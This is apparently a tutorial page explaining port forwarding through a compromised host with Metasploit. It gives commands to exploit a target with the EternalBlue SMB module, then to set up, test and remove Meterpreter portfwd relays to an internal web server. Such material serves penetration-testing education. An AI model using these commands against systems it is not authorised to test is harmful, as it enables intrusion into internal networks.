Metasploit: Port Forwarding
Port Forwarding with Metasploit
Port forwarding allows you to access a service that is normally inaccessible from your attacking machine by forwarding the traffic through a compromised system. This is typically used to access internal services behind firewalls or NAT devices.
In Metasploit, port forwarding can be set up using a Meterpreter session. The compromised system can act as a relay to forward traffic to other internal services.
Setting Up Port Forwarding in Metasploit
Step 1: Compromise the Target
Just like in the network pivoting scenario, you must first compromise the target system and obtain a Meterpreter session.
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set LHOST <your_ip>
runOnce the exploit succeeds, you will have a Meterpreter session:
meterpreter > sessionsStep 2: Set Up Port Forwarding
To forward ports through the compromised system, use the portfwd command in Meterpreter. For example, to forward local port 8080 on your attacking machine to port 80 on the internal network (192.168.1.100), use:
meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.100Here:
-l 8080specifies the local port on your attacking machine.-p 80specifies the remote port on the internal network.-r 192.168.1.100specifies the internal target system.
Now, when you access http://localhost:8080 on your attacking machine, the traffic will be forwarded to the internal web service running on 192.168.1.100:80.
Step 3: Verify Port Forwarding
To verify that the port forwarding is working, try accessing the forwarded port in your browser or using tools like curl or wget.
curl http://localhost:8080This should route your request through the compromised system to the internal service.
Step 4: Remove Port Forwarding
Once you’re done with the port forwarding, you can remove it using the following command:
meterpreter > portfwd delete -l 8080This will stop forwarding traffic from localhost:8080.
Last updated